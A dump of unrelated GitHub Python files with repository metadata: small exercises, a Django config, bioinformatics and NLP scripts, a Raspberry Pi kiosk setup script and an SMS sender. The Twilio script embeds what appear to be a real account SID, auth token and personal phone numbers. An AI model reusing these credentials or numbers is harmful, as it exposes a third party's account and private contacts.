2728120e2c4541f55d6851e56129bb3006d29142 | 71db6c302492c470f90c63a9dd57181337674a18 | /ch3/bai3.24.py | 2859708e19671a2202817314990f41fd21f12bae | [] | no_license | huybv1999/PythonSolution | 44dd474890bdea4a7bfc108a7d13eeaaca06f36e | 54fff433bb370e4b1cb4f980660a6f77fdb4d3af | refs/heads/main | 2023-01-19T23:55:06.867269 | 2020-11-30T15:25:53 | 2020-11-30T15:25:53 | 305,415,533 | 0 | 0 | null | 2020-11-28T19:54:12 | 2020-10-19T14:40:54 | Python | UTF-8 | Python | false | false | 292 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 5 18:15:36 2020
@author: huybv1998
"""
n = int(input("nhap 1 so n : "))
for i in range(1, n):
sum1 = 0
for j in range (1, i):
if (i % j == 0):
sum1 += j
if (sum1 == i):
print(sum1)
| [
"noreply@github.com"
] | huybv1999.noreply@github.com |
0a2d71946f7a3beb7d3039832ef4d851ca101ab9 | 6da19be45ff986768eb820f11691977cb3c84772 | /Python/5_Advance_buily_in_functions/501_generator_example/app.py | f86cf0322af9c70c5287d5b23541ecb63ab41ed6 | [] | no_license | alexp01/trainings | 9e72f3a571292b79d2b1518f564d2dc0a774ef41 | 9d8daee16f15e0d7851fab12ab3d2505386a686c | refs/heads/master | 2023-05-04T23:37:13.243691 | 2023-05-02T08:02:53 | 2023-05-02T08:02:53 | 272,425,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 867 | py |
# https://www.udemy.com/course/the-complete-python-course/learn/lecture/9445596#questions
# yield can be used to temporary stop a function, so that you can coninue it afterwards
def get_100_numbers() -> int:
i = 0
while i < 100:
yield i
i +=1
# yield is like a return, but it will also remember inside the function the last execution point and the values
# so when it reaches yield it will return i, and when its called again by next(variable), it will continue with i = I=1, and then run the while again
x = get_100_numbers()
print (x)
print (next(x)) # this will call again the function and it will continue from where it was stopped -> when i = 0
print (next(x)) # this will call again the function and it will continue from where it was stopped -> when i = 1
print(list(x)) # this will execute the function until it reaches the limit | [
"34630182+alexp01@users.noreply.github.com"
] | 34630182+alexp01@users.noreply.github.com |
ecf131c42e0620bb2b477ded3c859a74ccab5c4d | 049c5b8b38960692a40a46f41c91a39137437fcd | /perfect.py | 2513bedd8798d203bf322a2abb7b34e72e720835 | [] | no_license | sanketmakh/PROJECT | 95e3c79f8bf6c4533d6beec0f0a141afe7ba4dc9 | 4cfecb6702f7dc9af1fb3502b2a9414e214bbae8 | refs/heads/main | 2023-06-18T23:51:52.500055 | 2021-07-10T04:49:23 | 2021-07-10T04:49:23 | 384,611,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,149 | py | # Health Management System
# Total 6 Files, 3 For exercise and 3 For for diet
# 3 clients - Harry, Rohan and Hammad
# write a function that when executed takes as input client name
# one more function to retrieve exercise or food for any client
import datetime
def getdate():
return datetime.datetime.now()
def add_func(client):
if client == "1":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
add_item = input("What do you want to Add? : ")
if exer_diet == "1":
with open("harry_exer.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif exer_diet == "2":
with open("harry_diet.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif client == "2":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
add_item = input("What do you want to Add? : ")
if exer_diet == "1":
with open("rohan_exer.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif exer_diet == "2":
with open("rohan_diet.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif client == "3":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
add_item = input("What do you want to Add? : ")
if exer_diet == "1":
with open("hammad_exer.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif exer_diet == "2":
with open("hammad_diet.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
def retrive_func(client):
if client == "1":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
if exer_diet == "1":
try:
with open("harry_exer.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif exer_diet == "2":
try:
with open("harry_diet.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif client == "2":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
if exer_diet == "1":
try:
with open("rohan_exer.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif exer_diet == "2":
try:
with open("rohan_diet.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif client == "3":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
if exer_diet == "1":
try:
with open("hammad_exer.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif exer_diet == "2":
try:
with open("hammad_diet.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
print("\n")
print("\n")
print("\n")
print("***************** WELCOME TO HEALTH MANAGEMENT SYSTEM ******************")
client = input("Enter name as per the number:\n Press:\n1)Harry\n2)Rohan\n3)Hammad\n ")
add_retrieve = input("Enter number\n1)Add:\n2)Retrieve:\n")
if add_retrieve == "1":
add_func(client)
elif add_retrieve == "2":
retrive_func(client)
| [
"noreply@github.com"
] | sanketmakh.noreply@github.com |
3c9b520785fce67713ca22c75212273d02f94a2b | a61f9f5f7ef89ac77adc6d4a9363952b1487bedf | /alex28/alex28/asgi.py | 97411a6f4b507ad09a01f7c56706eef724e4d5ce | [] | no_license | Poojakulkarni18/AdvanceDjango | 6937b92e3a430086025eca4883a59c16386883c6 | 32994b1776e29469dcfbccd87e1e56ca1cbcb84a | refs/heads/main | 2023-04-16T06:38:10.920228 | 2021-04-21T10:56:21 | 2021-04-21T10:56:21 | 360,131,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for alex28 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'alex28.settings')
application = get_asgi_application()
| [
"pooja.kulkarni1811@gmail.com"
] | pooja.kulkarni1811@gmail.com |
3aa84a12c555bb02030d3ec9127a6ee3676a3089 | 3086b5195cb4dbb27aa73a24f6bf964440dff422 | /tools/fileinfo/detection/packers/pe-pack/test.py | 0d3de334959002d7c06f44c3a66d04733d5aa5ee | [
"MIT",
"Python-2.0"
] | permissive | avast/retdec-regression-tests | 8c6ea27ce2f5d0dfa6e6c845c38b56fa5bdfcc23 | 6662fed9d73cb7bc882ea69fd2429d5464950e39 | refs/heads/master | 2023-08-31T05:53:16.967008 | 2023-08-07T13:33:00 | 2023-08-15T08:33:07 | 113,974,761 | 7 | 10 | MIT | 2023-08-15T08:33:08 | 2017-12-12T10:11:00 | Python | UTF-8 | Python | false | false | 295 | py | from regression_tests import *
class Test(Test):
settings = TestSettings(
tool='fileinfo',
input='fact_rec.ex'
)
def test_correctly_analyzes_input_file(self):
assert self.fileinfo.succeeded
assert self.fileinfo.output.contains(r'.*PE-PACK \(1\.0*')
| [
"petr.zemek@avast.com"
] | petr.zemek@avast.com |
a19cd68debaab447420fbebc41cf433078095bc9 | 794075998ca79c106cdfa145c508a2564414f9e7 | /flask-nlp-api/nlp/clean_html.py | cada7c0718cbcf1207062dbee65e7c6e3351c886 | [
"MIT"
] | permissive | dr-jgsmith/flask-nlp-api | 814ab8cfb95ab20fd378642a17e5e3e4bdeb8851 | bc47594a0b200271ff71d1637ae76338d3b3912c | refs/heads/master | 2020-06-01T07:15:29.648678 | 2019-06-07T06:44:25 | 2019-06-07T06:44:25 | 190,694,684 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | import re
def clean_html(html):
"""
Remove HTML markup from the given string.
:param html: the HTML string to be cleaned
:type html: str
:rtype: str
"""
str_html = str(html)
# First we remove inline JavaScript/CSS:
cleaned = re.sub(r"(?is)<(script|style).*?>.*?(</\1>)", "", str_html.strip())
# Then we remove html comments. This has to be done before removing regular
# tags since comments can contain '>' characters.
cleaned = re.sub(r"(?s)<!--(.*?)-->[\n]?", "", cleaned)
# Next we can remove the remaining tags:
cleaned = re.sub(r"(?s)<.*?>", " ", cleaned)
# Finally, we deal with whitespace
cleaned = re.sub(r" ", " ", cleaned)
cleaned = re.sub(r"[\s]", " ", cleaned)
cleaned = re.sub(r" ", " ", cleaned)
cleaned = re.sub(r" ", "\n", cleaned)
clean = cleaned.split()
for i in clean:
if len(i) <= 1:
clean.remove(i)
else:
pass
clean = ' '.join(clean)
return clean
| [
"justin.smith@directharvest.io"
] | justin.smith@directharvest.io |
7a3b0b6c87c357aadf257f4f44f512d2f2a6cd10 | 46c33a3f955f5130aea0c8bea19c1439665b7d3a | /code/filt_key_kmer.py | 5b3ddb66fbd15eec434c2939676373520e59167f | [
"Apache-2.0"
] | permissive | ZjGaothu/KmerTR | c078a1af2c2acd7276cff74ee8c2722210c5f96c | cfaa7169c0f40401d8cdcbf9c8107ad3bb3d103e | refs/heads/main | 2023-05-25T19:52:41.515682 | 2021-06-06T13:18:34 | 2021-06-06T13:18:34 | 364,833,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,471 | py | import numpy as np
import pandas as pd
import argparse
def seq2kmer(K,sequence):
seq = sequence
encoding_matrix = {'a':'A', 'A':'A', 'c':'C', 'C':'C', 'g':'G', 'G':'G', 't':'T', 'T':'T', 'n':'N', 'N':'N'}
kmer_mat = []
for i in range(len(seq)-K+1):
sub_seq = seq[i:(i+K)]
sub_seq = list(sub_seq)
for j in range(K):
sub_seq[j] = encoding_matrix[sub_seq[j]]
kmer_mat.append(''.join(sub_seq) )
return kmer_mat
def get_args():
parser = argparse.ArgumentParser(description='Motif analysis')
parser.add_argument('--attention_weight_path', type=str, default='./data/seq/',
help='positive data set path')
parser.add_argument('--fasta_path', type=str, default='./data/tf/',
help='negtive tf motif score set path')
parser.add_argument('--save', type=str, default='./data/result/',
help='path to save the final feature')
parser.add_argument('--CREtype', type=str, default='silencers',
help='cis-regulatory element type')
parser.add_argument('--celltype', type=str, default='K562',
help='cell line')
parser.add_argument('--rank', type=int, default=2,
help='num of key kmer of each line of each CRE')
parser.add_argument('--num', type=int, default=3,
help='num of key kmer of each cell type & CRE type')
args = parser.parse_args()
return args
args = get_args()
CRE = args.CREtype
cell = args.celltype
save_path = args.save
attn_w_path = args.attention_weight_path
fasta_path = args.fasta_path
rank = args.rank
nums = args.num
# 保存所有attention 找到的kmer
cells_ = []
kmers_ = []
CREs_ = []
attention_pair = []
attention_weight = np.load(attn_w_path,allow_pickle=True).item()
data = list(attention_weight.values())
f = open(fasta_path)
ls=[]
for line in f:
ls.append(line.replace('\n',''))
f.close()
kmer_mat = []
for i in range(1,len(ls) + 1):
if i % 2 == 0:
continue
else:
kmer_mat.append(ls[i])
# generate kmer attention list
network = []
for i in range(len(data)):
temp_matrix = data[i]
kmer_cell = seq2kmer(5,kmer_mat[i])
for j in range(temp_matrix.shape[0]):
values = np.sort(temp_matrix[j])[-rank:]
source_kmer = kmer_cell[j]
for value in values:
max_index = np.where(temp_matrix[j]==value)
for k in range(len(max_index[0])):
target_kmer = kmer_cell[int(max_index[0][k])]
cell = []
cell.append(source_kmer)
cell.append(target_kmer)
cell.append(temp_matrix[j][max_index[0][k]])
network.append(cell)
network = np.array(network)
# generate kmer attention unique network
temp_network = network
all_kmer_dict = {}
map_idx2kmer = []
count = 0
for i in temp_network:
i_source = i[0]
i_target = i[1]
if i_source not in all_kmer_dict:
all_kmer_dict[i_source] = count
map_idx2kmer.append(i_source)
count += 1
if i_target not in all_kmer_dict:
all_kmer_dict[i_target] = count
map_idx2kmer.append(i_target)
count += 1
# generate adjacent matrix
subnetwork = np.zeros((len(all_kmer_dict),len(all_kmer_dict)))
adjacent = np.zeros((len(all_kmer_dict),len(all_kmer_dict)))
count = 0
for link in temp_network:
count += 1
subnetwork[int(all_kmer_dict[link[0]]),int(all_kmer_dict[link[1]])] += float(link[2])
adjacent[int(all_kmer_dict[link[0]]),int(all_kmer_dict[link[1]])] += 1
values = np.sort(adjacent.reshape(-1,))[-nums:]
# Get the most critical top Nums group results
for value in values:
max_index = np.where(adjacent==value)
for j in range(len(max_index[0])):
cell_one = []
source_kmer = map_idx2kmer[int(max_index[0][j])]
target_kmer = map_idx2kmer[int(max_index[1][j])]
cell_one.append(source_kmer)
cell_one.append(target_kmer)
cell_one.append(adjacent[max_index[0][j],max_index[1][j]])
cell_one.append(subnetwork[max_index[0][j],max_index[1][j]])
cell_one.append(cell)
cell_one.append(CRE)
attention_pair.append(cell_one)
# save result
attention_pair = np.array(attention_pair)
max_attn = pd.DataFrame(attention_pair,columns = ['source','target','attention hits','attention weight','cell line','CRE'])
max_attn.to_csv(save_path + 'key_kmer.csv')
| [
"noreply@github.com"
] | ZjGaothu.noreply@github.com |
0022ed38288d5e7eca8753a6954b82996e2bc701 | 29a82a7622ed99208ea84a6421c60f17a2b6e0ee | /ryd assignment.py | 7e6a21479beb31e0ff2930b916f4046a1393c239 | [] | no_license | bioinfonerd-forks/extract-text-from-pdf-using-python | a87b3f321580426674af6ca4fc2461ed43138867 | 5cc49df12c185184ddf77de59d06e1af2c70c662 | refs/heads/master | 2022-11-06T19:22:36.158719 | 2020-07-04T16:33:46 | 2020-07-04T16:33:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | #-*- coding: utf-8 -*-
import PyPDF2 as pdf
file=open('The_Living_World.pdf','rb')
file
pdf_reader=pdf.PdfFileReader(file)
pdf_reader
help(pdf_reader)
pdf_reader.getIsEncrypted()
pdf_reader.getNumPages()
i=0
while i<pdf_reader.getNumPages():
pageinfo=pdf_reader.getPage(i)
text=pageinfo.extractText()
print(text)
i=i+1
fd=open('The_Living_World.pdf','r','utf-8')
d=fd.read()
fd.close()
new_file=open('The_Living_World.pdf','w')
for i in range(len(file)):
new_file.write(fd)
new_file.close()
| [
"noreply@github.com"
] | bioinfonerd-forks.noreply@github.com |
1822516576499b6b4080fe2d76be4ae5758b4db8 | c9c26f132573da48c5122ffeb8da44d24b10ae01 | /snr/core/task_queue.py | 876f268e080d4895bc71308af907084a7267a97f | [
"MIT"
] | permissive | sfshaw/SNR | 549bdd887e4e1f4b70a37cb07f4a159fdadfab52 | 593b7b78a91e23e0fcb03985b72f29a66101579c | refs/heads/main | 2023-07-24T12:59:34.331611 | 2021-09-07T03:50:21 | 2021-09-07T03:50:21 | 301,933,814 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | import logging
import queue as que
from typing import Optional
from snr.prelude import *
from .contexts import Context
class TaskQueue(Context, AbstractTaskQueue):
queue: que.Queue[Task]
def __init__(self,
parent: AbstractContext,
task_source: TaskSource,
) -> None:
super().__init__("task_queue",
parent.profiler,
parent.timer)
self.task_source = task_source
self.queue = que.Queue()
self.log.setLevel(logging.WARNING)
def schedule(self, t: SomeTasks) -> None:
""" Adds a Task or a list of Tasks to the node's queue
"""
if isinstance(t, Task):
self.schedule_task(t)
elif t:
# Recursively handle lists
self.dbg("Recursively scheduling list of %s tasks",
len(t))
for item in t:
if item:
self.schedule(item)
else:
self.err("Cannot schedule %s", t)
def schedule_task(self, t: Task) -> None:
# Handle normal tasks
self.dbg("Scheduling task %s", t)
# Ignore Priority
self.queue.put(t)
def get_next(self) -> Optional[Task]:
"""Take the next task off the queue
"""
if self.queue.empty():
new_tasks = self.get_new_tasks()
if new_tasks:
self.schedule(new_tasks)
else:
return None
next = self.queue.get()
self.dbg("Next task: %s", next)
self.dbg("%s tasks left in queue", self.queue.qsize())
return next
def get_new_tasks(self) -> SomeTasks:
return self.task_source()
def is_empty(self) -> bool:
return self.queue.empty()
| [
"sfshaw@calpoly.edu"
] | sfshaw@calpoly.edu |
6bfdd123693cf5516a29996bfd135ee882ad1c7e | 60655d0db682b16d01913363e7c9239b30afc705 | /processors/errors/error_main_loop.py | 96a886432c5face5a40bcb362e5fac65362270b6 | [
"Apache-2.0"
] | permissive | ARLlab/Summit | b7fab84525d3257b746eb158be7ee43039823e80 | 1aa0d85cedebe85fab969df004409cc8f28595b3 | refs/heads/master | 2022-12-10T02:29:01.427830 | 2020-04-19T01:07:11 | 2020-04-19T01:07:11 | 171,544,780 | 0 | 4 | Apache-2.0 | 2022-12-03T01:07:56 | 2019-02-19T20:30:12 | Python | UTF-8 | Python | false | false | 5,372 | py | from datetime import datetime
import datetime as dt
import asyncio
from summit_errors import Error, NewDataEmail, sender, send_processor_email
PROC = 'Error Processor'
def new_data_found(processor, last_data_time, logger):
"""
Resolution function to be passed into Error objects.
:param processor: str, in ['voc', 'methane', 'picarro']
:param last_data_time: datetime, last datetime value for the given processor when the Error was initiated
:param logger: logging logger
:return: boolean, is there newer data in the database?
"""
if get_last_processor_date(processor, logger) > last_data_time:
return True
else:
return False
def get_last_processor_date(processor, logger):
"""
Retrieves the latest high-level date for the specified processor. It looks at GcRuns for VOCs (complete runs),
5-second Datums for the Picarro, and matched GcRuns for methane.
:param processor: str, in ['voc', 'picarro', 'methane']
:param logger: logging logger
:return: datetime, date of last data point for the specified processor
"""
from summit_core import connect_to_db, TempDir
if processor is 'voc':
from summit_core import voc_dir as directory
from summit_voc import GcRun as DataType
elif processor is 'picarro':
from summit_core import picarro_dir as directory
from summit_picarro import Datum as DataType
elif processor is 'methane':
from summit_core import methane_dir as directory
from summit_methane import GcRun as DataType
else:
logger.error('Invalid processor supplied to get_last_processor_date()')
assert False, 'Invalid processor supplied to get_last_processor_date()'
with TempDir(directory):
engine, session = connect_to_db(f'sqlite:///summit_{processor}.sqlite', directory)
val = session.query(DataType.date).order_by(DataType.date.desc()).first()
if val:
val = val[0]
session.close()
engine.dispose()
return val
def matching_error(error_list, reason, processor):
"""
There's a matching error if any error in the list has the same processor and reason associated with it.
:param error_list: list, of Error objects
:param reason: str, reason for the error
:param processor: str, in ['voc', 'methane', 'picarro']
:return: boolean, True if there's a matching error
"""
return next((True for err in error_list if
(err.email_template.processor == processor and err.reason == reason)), False)
async def check_for_new_data(logger, active_errors=None):
reason = 'no new data'
if not active_errors:
active_errors = []
try:
logger.info('Running check_for_new_data()')
for proc, time_limit in zip(['voc', 'methane', 'picarro'], [dt.timedelta(hours=hr) for hr in [8, 3, 2]]):
last_data_time = get_last_processor_date(proc, logger)
if not last_data_time:
logger.warning(f'No data available to compare for {proc}.')
continue
if datetime.now() - last_data_time > time_limit:
if matching_error(active_errors, reason, proc):
logger.error(f'Error for {reason} for the {proc} processor is already active and was ignored.')
continue
else:
active_errors.append(Error(reason, new_data_found, NewDataEmail(sender, proc, last_data_time)))
return active_errors
except Exception as e:
logger.error(f'Exception {e.args} occurred in check_for_new_data()')
send_processor_email(PROC, exception=e)
return False
async def check_existing_errors(logger, active_errors=None):
logger.info('Running check_existing_errors()')
try:
if not active_errors:
logger.info('Check_existing_errors() called without any active errors.')
return False
for ind, err in enumerate(active_errors):
if err.reason == 'no new data':
if err.is_resolved(processor=err.email_template.processor,
last_data_time=err.email_template.last_data_time, logger=logger):
active_errors[ind] = None
else:
logger.info('Error aside from "no new data" was found.')
pass # is_resolved() handles logging in both cases
active_errors = [err for err in active_errors if err]
return active_errors
except Exception as e:
logger.error(f'Exception {e.args} occurred in check_existing_errors()')
send_processor_email(PROC, exception=e)
return active_errors
async def main():
try:
from summit_core import configure_logger
from summit_core import error_dir as rundir
logger = configure_logger(rundir, __name__)
except Exception as e:
print('Error logger could not be configured')
send_processor_email(PROC, exception=e)
return False
errors = []
while True:
errors = await asyncio.create_task(check_for_new_data(logger, active_errors=errors))
await asyncio.create_task(check_existing_errors(logger, active_errors=errors))
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| [
"brendano257@gmail.com"
] | brendano257@gmail.com |
71455ed344306de3849479f4255343f938f388b0 | d769be9ec6a69429bd158890190cfbdfb5657402 | /sbdhmi.py | 8e2472d98a87c2c134a0d3114f3e82c1efb5b321 | [] | no_license | jwreplogle/sbd | 85bec400f17e81f9897dc2efc0237eaf02c278bd | 51165f96e88b5e4d8d6c88ecf14fd7f0939674bc | refs/heads/master | 2020-04-21T13:33:13.083722 | 2019-02-11T15:28:46 | 2019-02-11T15:28:46 | 169,602,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | import subprocess
import os
import sys
def uupdt():
#Installs updates and software
os.system('clear')
subprocess.call("sudo apt-get install x11-xserver-utils libnss3 unclutter", shell=True)
subprocess.call("sudo apt-get update", shell=True)
subprocess.call("sudo apt-get dist-upgrade -y", shell=True)
os.system('clear')
print('\x1b[6;30;42m' + 'Updates & Software Installed!' + '\x1b[0m')
def uusr():
#Creates a user and add them to sudo and adm
uname = raw_input("Type Username: ")
subprocess.call(["useradd", uname])
subprocess.call(["passwd", uname])
subprocess.call(["usermod", "-aG","sudo", uname])
subprocess.call(["usermod", "-aG","adm", uname])
print('\x1b[6;30;42m' + 'Sudo user creation is a Success!' + '\x1b[0m')
def startmod():
#modifies the autostart file
os.system('sudo cp /etc/xdg/lxsession/LXDE-pi/autostart /etc/xdg/lxsession/LXDE-pi/autostartorg')
os.system('sudo rm /etc/xdg/lxsession/LXDE-pi/autostart')
f = open('/etc/xdg/lxsession/LXDE-pi/autostart','w+')
f.write('\n' + '@lxpanel --profile LXDE-pi')
f.write('\n' + '@pcmanfm --desktop --profile LXDE-pi')
f.write('\n' + '@point-rpi')
f.write('\n' + '@xset s noblank')
f.write('\n' + '@xset s off')
f.write('\n' + '@xset -dpms')
f.write('\n' + '@unclutter -idle 0.1 -root')
uurl = raw_input("Enter URL=")
bob = '@chromium-browser --incognito --kiosk ' + uurl
f.write('\n' + bob)
f.close()
def limod():
#modifies the lightdm.conf file
f = open('/etc/lightdm/lightdm.conf','a')
f.write('\n' + 'xserver-command= X -s 0 -dpms')
f.close()
print('\x1b[6;30;42m' + 'File modification was a Success!' + '\x1b[0m')
def umod():
#remove login pi from sudo and adm
os.system('sudo deluser pi sudo')
os.system('sudo deluser pi adm')
print('\x1b[6;30;42m' + 'User Pi demotion was a Success!' + '\x1b[0m')
def uprint():
#the ending is near
print('\x1b[6;30;42m' + 'You may now reboot your system to go into KIOSK' + '\x1b[0m')
#start of programming
print('\033[94m' + "This script will:" + '\x1b[0m')
print('\033[94m' + "1: Update the system" + '\x1b[0m')
print('\033[94m' + "2: Install necessary software" + '\x1b[0m')
print('\033[94m' + "3: Ask you to create Admin user" + '\x1b[0m')
print('\033[94m' + "4: Modify autostart & lightdm files" + '\x1b[0m')
print('\033[94m' + "5: Demote user Pi" + '\x1b[0m')
print('\033[94m' + "Press CTRL C to Stop this process" + '\x1b[0m')
print('\033[94m' + "Or" + '\x1b[0m')
syop = int(input('\033[94m' + "Process Script? 1 -Continue 2 -Exit Script:" + '\x1b[0m'))
if syop == 1:
uupdt()
uusr()
startmod()
limod()
umod()
uprint()
else:
sys.exit()
| [
"noreply@github.com"
] | jwreplogle.noreply@github.com |
608ce75c1b12446acf0c7964552cd6c63b9473e8 | e9a08404751aee4891ed01fc7ef42c05761e853a | /py_send_sms.py | e55e59af7551b4a42d2c1ce9b7ea2db88e580a6a | [] | no_license | kathirm/TNPLTRPA | 8eed651ff46a02bcfe5de48153ec198751ee6c20 | db170bd8ad686543188c6aac82d2e9c12c72b0e7 | refs/heads/master | 2022-12-17T10:26:27.049538 | 2020-07-24T09:35:43 | 2020-07-24T09:35:43 | 171,221,067 | 0 | 0 | null | 2022-12-08T06:21:54 | 2019-02-18T05:35:17 | Python | UTF-8 | Python | false | false | 1,257 | py | from twilio.rest import Client
import string, time
import random
def otp():
try:
chars = string.digits;
password = ''
for i in range(4):
password += random.choice(chars)
except Exception as eR:
print "OTP Generation exception eror: %s"%eR
return password
def sms_integ():
try:
account_sid = 'ACeb5fcef2905d61dd58713018059ba3b3'
auth_token = 'a0adb50e5537cd8bba07907891c37ace'
#T = "+919566540187"
#B = "+919600099520"
J = "+918870653018"
#R = "+919884055194" UR
#CR = "+919791020409" UR
#K = "+918940776800"
#Y = "+919791305251"
client = Client(account_sid, auth_token)
#print "client_connection_status", client
password = otp()
message = client.messages.create(
body ='Hi...! Welcome to Terafast Networks RPA Portal-Access Login OTP : '+password+' Thank you :)',
from_ = '+12564729952',
to = J
)
print(message.sid)
print "OTP send Successfully for Registed PhoneNumber"
#time.sleep(20)
print "OTP Session Expired"
except Exception as er:
print er
sms_integ()
| [
"mkathir@terafastnet.com"
] | mkathir@terafastnet.com |
db499f2486f725b4c37aca12284a9f0c46c5c8e5 | 28cd5213b0b2815877de0d80882ba33ae12faaa1 | /Hate Speech/FeatureFunctions.py | d29c88c9d017a23d30d553b40c5fb7a26eada264 | [
"MIT"
] | permissive | davidpomerenke/HS-Detection-Project | 954b1c157fc7b5e2ed7c89618476058919b15618 | 480174581077a48ceee2609385ffd2a6fa0b55da | refs/heads/main | 2023-04-01T20:29:26.555046 | 2021-03-24T01:27:16 | 2021-03-24T01:27:16 | 350,909,183 | 0 | 0 | null | 2021-03-24T01:28:38 | 2021-03-24T01:28:37 | null | UTF-8 | Python | false | false | 10,871 | py | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
# In[1]:
import pandas as pd
import numpy as np
import pickle
import sys
from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.stem.porter import *
import string
import re
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer as VS
from textstat.textstat import *
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import SelectFromModel
from sklearn.metrics import classification_report
from sklearn.svm import LinearSVC
import matplotlib.pyplot as plt
import seaborn
#new
from nltk.tokenize.casual import casual_tokenize #casual_tokenize(text, preserve_case=True, reduce_len=False, strip_handles=False)
from nltk.tokenize import TreebankWordTokenizer
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
stemmer = PorterStemmer()
def preprocess(text_string):
"""
Accepts a text string and replaces:
1) urls with URLHERE
2) lots of whitespace with one instance
3) mentions with MENTIONHERE
This allows us to get standardized counts of urls and mentions
Without caring about specific people mentioned
"""
space_pattern = '\s+'
giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
'[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
mention_regex = '@[\w\-]+'
parsed_text = re.sub(space_pattern, ' ', text_string)
parsed_text = re.sub(giant_url_regex, '', parsed_text)
parsed_text = re.sub(mention_regex, '', parsed_text)
return parsed_text
def tokenize(tweet):
"""Removes punctuation & excess whitespace, sets to lowercase,
and stems tweets. Returns a list of stemmed tokens."""
tweet = " ".join(re.split("[^a-zA-Z]*", tweet.lower())).strip()
#print(tweet.split())
tokens = [stemmer.stem(t) for t in tweet.split()]
return tokens
def basic_tokenize(tweet):
"""Same as tokenize but without the stemming"""
tweet = " ".join(re.split("[^a-zA-Z.,!?]*", tweet.lower())).strip()
return tweet.split()
# Own function
def tokenize_words(tweet, use_stemmer = True):
"""Removes punctuation & excess whitespace, sets to lowercase,
and stems tweets. Returns a list of stemmed tokens."""
tweet = " ".join(re.split(r"[-\s.,;!)]+", tweet.lower())).strip()
if use_stemmer:
tokens = [stemmer.stem(t) for t in tweet.split()]
else:
tokens = [t for t in tweet.split()]
return tokens
def pos_tag_tweet(tweet, tokenizer, print_tweet = False):
tokens = tokenizer(tweet)
tags = nltk.pos_tag(tokens)
tag_list = [x[1] for x in tags]
tag_str = " ".join(tag_list)
return tag_str
# In[3]:
#Now get other features
sentiment_analyzer = VS()
def count_twitter_objs(text_string):
"""
Accepts a text string and replaces:
1) urls with URLHERE
2) lots of whitespace with one instance
3) mentions with MENTIONHERE
4) hashtags with HASHTAGHERE
This allows us to get standardized counts of urls and mentions
Without caring about specific people mentioned.
Returns counts of urls, mentions, and hashtags.
"""
space_pattern = '\s+'
giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
'[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
mention_regex = '@[\w\-]+'
hashtag_regex = '#[\w\-]+'
parsed_text = re.sub(space_pattern, ' ', text_string)
parsed_text = re.sub(giant_url_regex, 'URLHERE', parsed_text)
parsed_text = re.sub(mention_regex, 'MENTIONHERE', parsed_text)
parsed_text = re.sub(hashtag_regex, 'HASHTAGHERE', parsed_text)
return(parsed_text.count('URLHERE'),parsed_text.count('MENTIONHERE'),parsed_text.count('HASHTAGHERE'))
def other_features(tweet):
"""This function takes a string and returns a list of features.
These include Sentiment scores, Text and Readability scores,
as well as Twitter specific features"""
sentiment = sentiment_analyzer.polarity_scores(tweet)
words = preprocess(tweet) #Get text only
syllables = textstat.syllable_count(words)
num_chars = sum(len(w) for w in words)
num_chars_total = len(tweet)
num_terms = len(tweet.split())
num_words = len(words.split())
avg_syl = round(float((syllables+0.001))/float(num_words+0.001),4)
num_unique_terms = len(set(words.split()))
###Modified FK grade, where avg words per sentence is just num words/1
FKRA = round(float(0.39 * float(num_words)/1.0) + float(11.8 * avg_syl) - 15.59,1)
